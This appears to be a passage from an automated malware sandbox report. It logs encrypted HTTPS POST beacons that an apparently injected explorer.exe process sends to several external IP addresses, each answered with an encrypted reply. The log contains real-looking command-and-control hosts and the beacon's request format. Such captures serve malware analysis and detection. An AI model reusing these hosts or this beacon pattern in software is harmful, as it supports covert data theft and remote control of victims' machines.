                                                          2024-07-19 11:46:22 UTC685INData Raw: 42 69 35 6e 58 32 55 37 50 2f 43 7a 6f 64 30 56 6e 47 69 6a 6b 30 43 50 2f 6d 33 58 39 4f 4d 32 6c 6f 51 7a 52 73 39 30 4b 37 4a 41 62 4c 54 2f 30 43 44 52 6e 54 57 76 55 6b 37 79 77 50 58 6f 68 34 77 71 47 50 35 37 6c 59 32 66 46 54 6b 73 32 78 71 72 2b 37 6e 50 44 2b 6f 49 65 71 57 73 45 56 38 6c 55 61 34 6d 64 36 48 75 63 75 6b 6a 59 4f 79 32 4d 66 39 43 55 79 38 56 52 63 6d 72 52 6a 45 55 78 4d 6c 4c 72 78 56 45 50 2f 62 75 4c 4f 79 76 55 6c 6b 4b 31 47 32 30 34 48 44 77 45 59 4f 70 4e 79 42 52 56 5a 36 4c 74 57 79 52 64 36 67 79 79 30 38 34 46 52 37 4a 37 61 68 63 5a 70 57 37 64 52 73 61 4e 37 2f 31 6b 6a 59 79 75 6f 67 51 30 61 59 6e 4f 63 65 30 54 39 53 63 79 5a 4e 62 37 44 75 50 5a 5a 53 39 67 58 6e 45 4b 47 64 4a 43 32 66 66 50 5a 6f 4b 39 4f 56
                                                          Data Ascii: Bi5nX2U7P/Czod0VnGijk0CP/m3X9OM2loQzRs90K7JAbLT/0CDRnTWvUk7ywPXoh4wqGP57lY2fFTks2xqr+7nPD+oIeqWsEV8lUa4md6HucukjYOy2Mf9CUy8VRcmrRjEUxMlLrxVEP/buLOyvUlkK1G204HDwEYOpNyBRVZ6LtWyRd6gyy084FR7J7ahcZpW7dRsaN7/1kjYyuogQ0aYnOce0T9ScyZNb7DuPZZS9gXnEKGdJC2ffPZoK9OV


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          62192.168.2.557867107.173.160.1394431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:46:23 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.139
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:46:23 UTC1122OUTData Raw: 72 42 30 7a 53 4d 7a 2b 75 57 55 39 30 2b 33 49 4d 36 2b 4e 44 38 52 74 34 49 68 71 2b 71 42 58 7a 78 6b 61 2f 46 69 5a 78 6b 35 6b 43 45 46 46 39 2b 76 6e 30 34 4e 58 78 78 32 65 78 4c 4e 57 79 4c 6e 77 53 6a 36 37 71 52 48 58 56 66 55 55 43 57 6d 38 56 53 39 66 78 39 4c 30 4f 68 49 71 56 61 44 76 52 6f 33 4f 41 74 4a 41 30 76 42 53 56 32 63 78 38 4e 6f 69 33 59 52 58 4b 42 69 58 61 34 6b 77 72 6b 67 4f 4a 2f 46 6d 64 37 35 2b 46 6c 52 6f 34 63 31 66 33 4e 42 70 71 49 64 4e 35 58 68 4b 2b 61 62 6c 6e 65 38 6a 50 39 4b 75 33 79 31 4b 66 43 33 75 64 72 2f 58 39 57 33 73 34 30 45 6a 78 61 57 52 63 6f 48 4e 6b 73 59 5a 6f 4b 70 52 43 50 50 56 61 7a 63 2f 55 70 43 76 52 36 76 38 34 6f 45 70 6c 54 4f 5a 4b 31 6c 75 36 49 68 4a 63 2f 4f 64 4d 31 42 78 30 74 45
                                                          Data Ascii: rB0zSMz+uWU90+3IM6+ND8Rt4Ihq+qBXzxka/FiZxk5kCEFF9+vn04NXxx2exLNWyLnwSj67qRHXVfUUCWm8VS9fx9L0OhIqVaDvRo3OAtJA0vBSV2cx8Noi3YRXKBiXa4kwrkgOJ/Fmd75+FlRo4c1f3NBpqIdN5XhK+ablne8jP9Ku3y1KfC3udr/X9W3s40EjxaWRcoHNksYZoKpRCPPVazc/UpCvR6v84oEplTOZK1lu6IhJc/OdM1Bx0tE
                                                          2024-07-19 11:46:24 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:46:24 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:46:24 UTC685INData Raw: 6f 46 32 79 31 34 66 2b 50 34 42 65 70 6e 54 79 38 53 36 6e 4f 56 2b 49 67 62 59 75 73 52 58 4f 34 6d 5a 36 42 65 4d 6e 4a 63 36 68 6b 77 55 75 33 57 54 42 4a 42 55 30 66 6a 62 54 4f 64 30 57 64 57 65 79 49 6b 4a 5a 66 59 69 79 2b 48 2b 34 77 64 41 52 68 39 38 70 6d 54 74 55 6e 34 61 75 4e 67 44 70 51 4c 33 7a 5a 68 31 6f 56 74 54 2b 35 2b 68 51 4d 50 4b 33 6d 44 68 51 6b 52 30 47 5a 63 6c 69 30 30 33 5a 74 54 42 55 61 65 45 73 4c 71 43 56 38 41 6b 78 6b 50 42 4b 6b 38 55 64 59 6a 30 2b 44 4b 41 41 36 33 6e 42 73 5a 36 76 4d 37 6e 76 49 54 38 43 48 4a 42 32 65 61 6c 76 78 4c 51 39 68 6e 6c 39 6c 4a 4f 44 38 38 4d 37 45 6e 79 4a 42 63 49 52 41 76 59 78 65 31 6b 2b 4d 66 55 4e 73 54 78 35 34 31 6e 47 32 47 2b 4b 69 6c 46 2b 39 71 48 45 2b 54 73 58 55 42 4f
                                                          Data Ascii: oF2y14f+P4BepnTy8S6nOV+IgbYusRXO4mZ6BeMnJc6hkwUu3WTBJBU0fjbTOd0WdWeyIkJZfYiy+H+4wdARh98pmTtUn4auNgDpQL3zZh1oVtT+5+hQMPK3mDhQkR0GZcli003ZtTBUaeEsLqCV8AkxkPBKk8UdYj0+DKAA63nBsZ6vM7nvIT8CHJB2ealvxLQ9hnl9lJOD88M7EnyJBcIRAvYxe1k+MfUNsTx541nG2G+KilF+9qHE+TsXUBO


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          63192.168.2.557868167.235.128.1534431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:46:25 UTC234OUTPOST / HTTP/1.1
                                                          Host: 167.235.128.153
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:46:25 UTC1122OUTData Raw: 50 42 6e 6c 72 47 73 4e 47 62 31 76 38 62 30 61 69 4a 47 34 7a 6f 46 65 70 71 63 33 4e 79 50 77 65 2f 47 31 67 4d 66 62 70 78 64 62 35 61 36 6e 52 76 4a 79 35 6a 50 47 4f 71 6a 31 76 65 43 49 70 68 62 71 54 6a 4e 36 53 47 57 48 6b 53 65 57 34 70 6a 48 30 4b 69 65 6a 48 58 79 54 68 79 70 61 43 4b 46 77 75 76 6b 6a 66 74 33 4a 65 42 75 39 47 46 7a 65 58 34 6a 57 59 31 4a 6b 48 35 58 71 74 41 30 61 32 61 78 76 38 47 38 59 6c 2b 68 6c 30 45 67 78 62 39 38 30 55 74 55 52 6f 55 47 36 7a 79 77 58 57 45 46 70 75 78 77 62 64 62 6e 75 6a 2f 36 37 38 4b 61 4e 78 76 59 33 47 4a 4f 77 45 79 50 7a 47 57 30 76 72 38 75 4b 37 61 6a 41 32 58 6a 48 6a 66 51 6f 63 68 31 79 7a 45 4b 2f 34 59 6b 71 47 34 79 78 77 71 55 41 4c 37 48 58 55 6a 4d 63 5a 52 6e 45 6e 5a 35 4b 6f 66
                                                          Data Ascii: PBnlrGsNGb1v8b0aiJG4zoFepqc3NyPwe/G1gMfbpxdb5a6nRvJy5jPGOqj1veCIphbqTjN6SGWHkSeW4pjH0KiejHXyThypaCKFwuvkjft3JeBu9GFzeX4jWY1JkH5XqtA0a2axv8G8Yl+hl0Egxb980UtURoUG6zywXWEFpuxwbdbnuj/678KaNxvY3GJOwEyPzGW0vr8uK7ajA2XjHjfQoch1yzEK/4YkqG4yxwqUAL7HXUjMcZRnEnZ5Kof
                                                          2024-07-19 11:46:26 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:46:26 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:46:26 UTC685INData Raw: 42 70 4b 32 76 67 69 55 59 69 55 61 72 43 2b 73 37 49 36 79 77 34 4f 63 75 36 67 58 46 2b 66 41 4b 4d 67 49 56 48 7a 51 39 76 44 39 36 4e 76 66 6c 79 73 57 51 39 4b 39 6d 6b 6e 7a 39 6c 37 50 58 4e 32 52 4d 45 77 41 79 57 6d 4d 70 2b 73 7a 4b 65 4a 6f 4d 50 4b 76 48 76 58 63 71 77 38 4c 41 50 64 6b 39 32 31 32 57 65 58 35 6c 75 39 70 79 45 51 67 6c 2f 58 56 34 37 68 30 43 6f 6f 5a 49 68 6a 6e 67 45 64 65 38 4a 6b 63 71 49 57 57 34 31 78 53 4c 66 52 37 6a 6f 7a 30 5a 59 54 72 51 46 6b 32 4d 66 73 76 6d 76 2f 6b 6f 77 6c 6f 6e 79 2b 7a 38 41 41 59 43 41 32 56 61 70 72 72 59 6a 5a 2b 6b 75 63 70 5a 6b 72 61 2f 50 54 73 32 2f 50 4e 57 6a 7a 67 36 4f 6a 74 59 31 58 66 78 30 38 2b 61 51 31 35 4b 73 51 67 62 4b 44 65 37 59 69 4b 68 4b 58 42 65 73 77 76 38 71 33
                                                          Data Ascii: BpK2vgiUYiUarC+s7I6yw4Ocu6gXF+fAKMgIVHzQ9vD96NvflysWQ9K9mknz9l7PXN2RMEwAyWmMp+szKeJoMPKvHvXcqw8LAPdk9212WeX5lu9pyEQgl/XV47h0CooZIhjngEde8JkcqIWW41xSLfR7joz0ZYTrQFk2Mfsvmv/kowlony+z8AAYCA2VaprrYjZ+kucpZkra/PTs2/PNWjzg6OjtY1Xfx08+aQ15KsQgbKDe7YiKhKXBeswv8q3


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          64192.168.2.557869107.173.160.1374431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:46:27 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.137
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1412
                                                          2024-07-19 11:46:27 UTC1412OUTData Raw: 4a 33 68 69 51 53 38 30 46 42 32 56 53 66 74 41 63 39 58 48 46 32 42 53 6b 71 37 75 56 31 34 69 58 72 46 35 4b 48 56 51 62 75 68 68 35 66 51 50 51 30 55 6c 6c 74 78 49 30 62 5a 43 54 39 59 62 55 55 4a 56 53 76 45 56 2b 63 75 72 51 4d 73 62 67 50 73 44 53 4d 52 75 70 39 67 55 67 65 45 66 54 76 68 4d 70 38 62 49 6b 51 4c 52 4a 48 61 57 76 31 6c 53 42 33 45 4d 6f 61 52 70 75 79 56 4c 7a 73 4c 6b 49 4b 53 49 78 56 6f 4b 75 71 67 45 58 64 4d 34 32 65 30 2b 78 34 43 37 2b 78 41 47 63 67 6d 71 33 38 4b 46 59 58 31 5a 50 4a 5a 5a 79 4e 53 70 77 72 6d 2b 6e 32 37 6c 35 65 66 53 6e 51 4d 70 38 69 6f 35 44 63 72 53 6f 63 70 65 6f 67 4e 76 61 2b 55 38 49 49 7a 4e 37 2f 31 6f 2b 75 59 62 46 65 36 42 54 73 66 43 43 30 4d 4c 74 41 42 63 73 50 31 39 6d 76 50 75 49 4c 41
                                                          Data Ascii: J3hiQS80FB2VSftAc9XHF2BSkq7uV14iXrF5KHVQbuhh5fQPQ0UlltxI0bZCT9YbUUJVSvEV+curQMsbgPsDSMRup9gUgeEfTvhMp8bIkQLRJHaWv1lSB3EMoaRpuyVLzsLkIKSIxVoKuqgEXdM42e0+x4C7+xAGcgmq38KFYX1ZPJZZyNSpwrm+n27l5efSnQMp8io5DcrSocpeogNva+U8IIzN7/1o+uYbFe6BTsfCC0MLtABcsP19mvPuILA
                                                          2024-07-19 11:46:28 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:46:28 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:46:28 UTC685INData Raw: 4c 4c 42 50 66 4a 76 39 5a 69 6d 63 79 49 35 73 54 78 55 41 75 65 52 66 62 43 70 58 71 72 56 31 6f 30 30 4d 63 30 43 41 5a 68 52 67 72 6b 44 30 61 54 47 50 69 4b 42 72 70 4d 36 6d 4a 76 77 44 65 6d 79 49 77 5a 6d 4d 2b 7a 69 71 4a 44 44 39 38 4f 76 4e 52 47 6f 76 6d 6d 62 5a 56 45 4b 53 57 56 66 6b 2f 79 73 30 32 37 46 6c 5a 59 75 64 7a 73 46 68 45 37 58 33 6b 54 58 72 78 73 57 64 2b 51 4d 6e 45 63 6c 77 54 49 35 72 4f 4a 55 58 47 48 44 45 7a 2f 42 4c 4d 37 6f 5a 51 68 4b 56 63 77 67 69 47 4d 61 6f 4b 46 70 72 4e 43 46 37 44 79 49 63 66 74 64 69 4c 33 6c 53 42 2b 77 50 34 63 67 36 34 39 74 68 64 54 62 38 39 68 71 61 4a 49 6c 39 56 59 42 55 4e 34 42 6c 63 4a 44 2f 70 2f 73 68 7a 47 70 41 66 54 74 47 6a 74 50 33 4d 69 78 56 35 49 75 2b 61 31 41 68 4b 74 45
                                                          Data Ascii: LLBPfJv9ZimcyI5sTxUAueRfbCpXqrV1o00Mc0CAZhRgrkD0aTGPiKBrpM6mJvwDemyIwZmM+ziqJDD98OvNRGovmmbZVEKSWVfk/ys027FlZYudzsFhE7X3kTXrxsWd+QMnEclwTI5rOJUXGHDEz/BLM7oZQhKVcwgiGMaoKFprNCF7DyIcftdiL3lSB+wP4cg649thdTb89hqaJIl9VYBUN4BlcJD/p/shzGpAfTtGjtP3MixV5Iu+a1AhKtE


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          65192.168.2.557871107.173.160.1394431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:46:29 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.139
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:46:29 UTC1122OUTData Raw: 4d 61 39 77 43 75 62 33 36 7a 76 57 57 69 73 49 41 7a 43 4a 77 47 32 75 31 50 56 6b 47 35 5a 6e 34 6a 4b 4d 63 66 6a 5a 59 4e 68 59 62 46 72 65 32 31 73 4e 56 59 41 6d 62 67 5a 2b 51 4a 59 6f 43 35 6f 4d 35 47 61 33 46 72 45 31 4b 7a 75 38 2f 2f 61 74 78 45 57 50 63 55 44 2b 49 4f 55 4c 6a 78 56 78 4f 56 5a 36 56 7a 56 44 6d 4e 38 39 41 30 75 79 61 2b 59 44 41 2b 6d 54 4a 45 71 6a 50 54 59 46 63 57 31 70 4f 51 6b 6c 62 6b 78 73 6e 69 5a 66 55 63 75 38 6e 6f 6e 31 4c 47 72 79 66 4e 6a 62 48 33 61 65 7a 47 67 70 33 65 41 54 36 31 54 6b 59 63 56 54 4c 49 4b 72 77 53 69 34 54 6f 38 63 65 34 5a 65 62 33 79 44 59 44 53 6e 6a 4b 65 50 2b 4c 71 71 43 6c 39 52 74 69 62 39 38 49 32 54 4a 78 41 52 4a 2f 39 47 5a 42 35 48 74 31 6e 38 73 4e 66 66 45 33 36 56 77 59 4e
                                                          Data Ascii: Ma9wCub36zvWWisIAzCJwG2u1PVkG5Zn4jKMcfjZYNhYbFre21sNVYAmbgZ+QJYoC5oM5Ga3FrE1Kzu8//atxEWPcUD+IOULjxVxOVZ6VzVDmN89A0uya+YDA+mTJEqjPTYFcW1pOQklbkxsniZfUcu8non1LGryfNjbH3aezGgp3eAT61TkYcVTLIKrwSi4To8ce4Zeb3yDYDSnjKeP+LqqCl9Rtib98I2TJxARJ/9GZB5Ht1n8sNffE36VwYN
                                                          2024-07-19 11:46:31 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:46:31 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:46:31 UTC685INData Raw: 6f 4f 54 46 55 51 49 31 70 52 7a 61 47 38 37 70 59 4b 2b 61 6d 6c 74 74 56 69 31 34 53 33 6b 62 49 30 6c 4e 75 47 77 41 61 68 48 71 6e 75 42 74 59 64 51 49 33 57 46 2f 55 62 4b 32 41 47 45 73 52 51 46 69 35 2f 6f 78 51 36 31 4d 4f 45 74 37 30 6b 38 30 76 74 73 62 51 5a 56 65 69 6f 6b 70 6c 56 43 4a 79 38 62 50 4b 68 58 38 54 4e 39 44 30 38 71 61 55 6d 79 66 77 73 46 6d 31 67 42 4f 67 43 77 4c 2b 4e 62 6c 4b 6f 65 4d 62 71 48 50 59 72 42 56 6c 6d 76 65 37 67 67 42 42 41 37 68 65 44 50 31 4b 58 34 4d 65 4d 44 74 65 45 52 4e 4d 55 4e 62 74 76 38 65 7a 35 2f 4f 58 54 33 42 6e 66 4e 38 4c 6a 2f 6d 67 2f 47 52 57 43 7a 75 6c 32 6f 36 48 44 44 30 62 4b 53 75 62 46 4d 67 2f 30 44 42 54 64 4c 6e 2f 48 51 66 76 30 4d 6b 64 4d 76 54 62 47 7a 74 69 6b 48 6f 51 76 45
                                                          Data Ascii: oOTFUQI1pRzaG87pYK+amlttVi14S3kbI0lNuGwAahHqnuBtYdQI3WF/UbK2AGEsRQFi5/oxQ61MOEt70k80vtsbQZVeiokplVCJy8bPKhX8TN9D08qaUmyfwsFm1gBOgCwL+NblKoeMbqHPYrBVlmve7ggBBA7heDP1KX4MeMDteERNMUNbtv8ez5/OXT3BnfN8Lj/mg/GRWCzul2o6HDD0bKSubFMg/0DBTdLn/HQfv0MkdMvTbGztikHoQvE


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          66192.168.2.557872167.235.128.1534431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:46:31 UTC234OUTPOST / HTTP/1.1
                                                          Host: 167.235.128.153
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:46:31 UTC1122OUTData Raw: 58 30 69 32 58 46 59 30 75 33 36 7a 57 63 58 42 46 63 6d 6a 78 47 32 59 39 7a 52 78 31 34 6e 72 71 41 53 6c 38 70 6c 45 48 2f 31 32 30 42 4e 58 63 6f 66 5a 7a 57 51 47 43 63 79 4a 73 6a 64 7a 45 51 5a 75 7a 61 2b 55 72 48 32 4c 33 64 74 39 62 71 4b 47 64 79 6e 2f 4b 74 7a 76 56 44 61 72 56 4c 68 6a 47 4a 43 6a 4b 72 48 41 2b 30 2b 62 52 66 53 76 42 49 56 6a 4f 4b 6a 4d 52 68 6d 65 2b 68 6d 79 73 34 30 50 71 43 51 6b 53 32 70 49 6a 71 78 6d 78 63 6f 50 69 56 77 43 45 38 49 44 74 59 30 56 78 72 67 73 4c 6d 4a 70 32 65 64 48 30 37 62 4a 61 72 4c 47 74 4c 63 51 54 69 42 45 4a 57 67 51 56 6d 51 38 4a 57 52 70 59 51 7a 41 30 65 4c 32 52 6c 4e 49 65 79 4d 4f 49 53 51 2f 4b 4c 6a 5a 4e 57 47 5a 39 44 42 35 43 55 53 31 74 4d 59 67 76 75 33 6b 4e 73 61 78 6c 44 66
                                                          Data Ascii: X0i2XFY0u36zWcXBFcmjxG2Y9zRx14nrqASl8plEH/120BNXcofZzWQGCcyJsjdzEQZuza+UrH2L3dt9bqKGdyn/KtzvVDarVLhjGJCjKrHA+0+bRfSvBIVjOKjMRhme+hmys40PqCQkS2pIjqxmxcoPiVwCE8IDtY0VxrgsLmJp2edH07bJarLGtLcQTiBEJWgQVmQ8JWRpYQzA0eL2RlNIeyMOISQ/KLjZNWGZ9DB5CUS1tMYgvu3kNsaxlDf
                                                          2024-07-19 11:46:32 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:46:32 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:46:32 UTC685INData Raw: 5a 7a 6f 54 31 56 71 55 6b 47 66 74 36 45 54 37 4d 63 56 79 63 64 6c 46 69 37 66 59 75 45 4c 70 2f 49 34 51 35 53 47 58 34 59 7a 38 39 58 4a 78 30 2f 5a 54 31 71 6b 78 54 76 47 50 6d 4c 4c 67 41 50 31 59 46 49 45 58 73 75 76 51 39 35 48 53 4d 62 52 49 42 56 61 79 70 64 45 38 38 2b 45 6f 77 66 51 6e 49 58 72 61 63 64 34 68 44 2f 67 35 46 45 38 37 78 37 61 63 62 79 4e 77 4f 6a 6a 62 4d 2f 37 34 33 49 4a 32 75 62 76 30 4e 2b 48 6f 58 4b 44 43 4c 2b 5a 67 32 5a 55 46 53 2b 47 66 68 54 42 6a 2b 61 76 70 41 34 4b 36 78 61 71 48 78 55 33 30 2b 71 35 63 4a 4e 59 47 2b 41 42 4e 54 76 43 6d 63 74 38 66 59 66 4e 4a 58 2b 30 36 69 37 33 42 6f 30 51 75 4a 30 72 62 62 61 52 79 71 74 37 65 62 5a 58 4e 38 66 65 6a 4b 31 2f 53 41 73 6a 4b 73 33 62 76 64 64 44 34 72 5a 57
                                                          Data Ascii: ZzoT1VqUkGft6ET7McVycdlFi7fYuELp/I4Q5SGX4Yz89XJx0/ZT1qkxTvGPmLLgAP1YFIEXsuvQ95HSMbRIBVaypdE88+EowfQnIXracd4hD/g5FE87x7acbyNwOjjbM/743IJ2ubv0N+HoXKDCL+Zg2ZUFS+GfhTBj+avpA4K6xaqHxU30+q5cJNYG+ABNTvCmct8fYfNJX+06i73Bo0QuJ0rbbaRyqt7ebZXN8fejK1/SAsjKs3bvddD4rZW


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          67192.168.2.557873107.173.160.1374431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:46:33 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.137
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1267
                                                          2024-07-19 11:46:33 UTC1267OUTData Raw: 47 59 35 30 6f 70 49 46 37 69 6e 64 46 66 4b 6c 42 72 55 74 33 38 5a 42 36 43 39 65 52 79 4a 73 6a 62 45 50 72 33 49 6f 35 75 44 7a 35 4b 59 61 62 42 6b 31 74 62 32 68 62 38 7a 59 5a 4f 32 74 6a 4e 4a 4f 4d 53 4b 4a 51 47 61 59 2b 33 58 65 6a 71 78 53 49 6b 32 30 62 58 36 58 39 50 32 42 77 49 4a 4c 63 55 74 2f 7a 6c 31 41 51 6b 30 4f 31 33 44 70 32 42 55 49 32 73 54 73 2b 69 6d 6d 4f 5a 4a 34 72 2b 38 4b 68 62 66 6b 44 36 46 71 44 70 30 41 4f 6e 47 61 46 56 78 4d 6c 49 58 43 61 6b 39 45 37 6c 38 73 32 71 2f 42 41 41 33 6c 33 55 41 41 34 43 71 6d 31 4b 4b 76 48 43 4f 4d 78 48 72 64 6c 36 69 47 6b 57 6c 68 32 4e 61 65 53 51 46 46 72 57 61 44 6f 58 6a 32 66 76 4b 62 57 66 41 4e 4e 7a 30 33 50 4e 76 6a 6e 46 62 76 57 70 66 64 68 53 74 6c 74 77 32 79 58 51 6b
                                                          Data Ascii: GY50opIF7indFfKlBrUt38ZB6C9eRyJsjbEPr3Io5uDz5KYabBk1tb2hb8zYZO2tjNJOMSKJQGaY+3XejqxSIk20bX6X9P2BwIJLcUt/zl1AQk0O13Dp2BUI2sTs+immOZJ4r+8KhbfkD6FqDp0AOnGaFVxMlIXCak9E7l8s2q/BAA3l3UAA4Cqm1KKvHCOMxHrdl6iGkWlh2NaeSQFFrWaDoXj2fvKbWfANNz03PNvjnFbvWpfdhStltw2yXQk
                                                          2024-07-19 11:46:34 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:46:34 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
                                                          2024-07-19 11:46:34 UTC685INData Raw: 6d 51 33 54 50 37 67 67 53 46 79 31 44 54 2b 69 71 6c 77 75 6e 74 6f 5a 50 68 55 61 34 61 39 47 67 7a 39 47 52 62 66 34 49 56 6a 65 2b 39 57 64 79 6e 56 74 74 4a 4e 34 68 62 66 62 4c 36 69 6e 54 6b 59 4f 6a 48 42 76 45 64 53 4d 77 75 56 69 62 63 49 75 6e 45 41 35 4e 71 54 4d 4a 73 51 44 61 6a 73 4b 75 41 62 4e 30 70 59 68 35 72 36 73 4a 74 4a 77 73 4a 4c 6c 68 6f 38 43 6c 57 2b 62 45 54 4d 4b 35 72 6a 68 36 53 63 38 37 44 62 70 58 2f 30 70 7a 6b 6f 62 49 6b 69 74 42 41 69 49 38 70 51 78 65 41 4a 43 4d 52 56 44 42 2f 63 41 51 78 32 53 4e 49 43 42 63 78 6c 62 6f 56 44 44 41 4f 55 41 36 6e 4c 39 35 41 58 34 76 6c 72 57 4c 2f 44 37 2f 69 6d 46 41 67 70 63 42 30 47 57 56 58 6f 6d 30 5a 38 62 64 41 4b 4b 33 74 4b 73 75 2f 4f 4f 49 57 48 55 68 62 48 74 30 50 35
                                                          Data Ascii: mQ3TP7ggSFy1DT+iqlwuntoZPhUa4a9Ggz9GRbf4IVje+9WdynVttJN4hbfbL6inTkYOjHBvEdSMwuVibcIunEA5NqTMJsQDajsKuAbN0pYh5r6sJtJwsJLlho8ClW+bETMK5rjh6Sc87DbpX/0pzkobIkitBAiI8pQxeAJCMRVDB/cAQx2SNICBcxlboVDDAOUA6nL95AX4vlrWL/D7/imFAgpcB0GWVXom0Z8bdAKK3tKsu/OOIWHUhbHt0P5


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          68192.168.2.557875107.173.160.1394431028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-07-19 11:46:35 UTC234OUTPOST / HTTP/1.1
                                                          Host: 107.173.160.139
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                          Connection: close
                                                          Content-Type: text/plain
                                                          Content-Length: 1122
                                                          2024-07-19 11:46:35 UTC1122OUTData Raw: 67 54 7a 51 45 49 55 6b 56 57 30 66 35 54 66 65 41 2b 61 59 2b 4f 70 62 6c 42 61 59 58 69 2b 39 70 71 34 78 75 55 55 6f 30 4d 55 42 6a 41 35 4d 2b 4b 63 59 58 70 56 6e 2f 71 32 72 4b 72 49 76 53 39 6e 66 66 55 6b 44 42 33 62 6f 30 42 6b 71 67 79 62 44 30 4e 6e 38 43 4d 67 52 38 76 4a 49 72 4d 66 53 39 74 48 71 64 47 68 45 37 67 32 75 4c 79 62 66 4b 77 49 44 73 54 79 57 58 2f 6f 4c 35 50 79 50 6d 4a 6f 57 67 46 66 31 6c 59 54 4f 58 77 37 33 74 2b 38 39 53 48 6f 4a 58 61 4e 5a 6e 69 33 37 59 30 38 34 33 47 50 62 6e 72 76 59 70 67 58 76 6a 50 4e 77 78 64 46 66 33 57 67 57 36 78 78 59 33 62 4b 6b 43 6d 43 78 39 49 73 59 53 2f 62 71 50 73 53 51 39 70 59 32 58 6f 62 31 39 34 37 4e 2f 71 50 6c 61 58 30 45 4f 32 48 75 54 74 57 34 37 4d 43 71 42 6e 5a 42 2f 47 62
                                                          Data Ascii: gTzQEIUkVW0f5TfeA+aY+OpblBaYXi+9pq4xuUUo0MUBjA5M+KcYXpVn/q2rKrIvS9nffUkDB3bo0BkqgybD0Nn8CMgR8vJIrMfS9tHqdGhE7g2uLybfKwIDsTyWX/oL5PyPmJoWgFf1lYTOXw73t+89SHoJXaNZni37Y0843GPbnrvYpgXvjPNwxdFf3WgW6xxY3bKkCmCx9IsYS/bqPsSQ9pY2Xob1947N/qPlaX0EO2HuTtW47MCqBnZB/Gb
                                                          2024-07-19 11:46:36 UTC137INHTTP/1.1 200 OK
                                                          Content-Length: 685
                                                          Date: Fri, 19 Jul 2024 11:46:36 GMT
                                                          Content-Type: text/plain; charset=utf-8
                                                          Connection: close
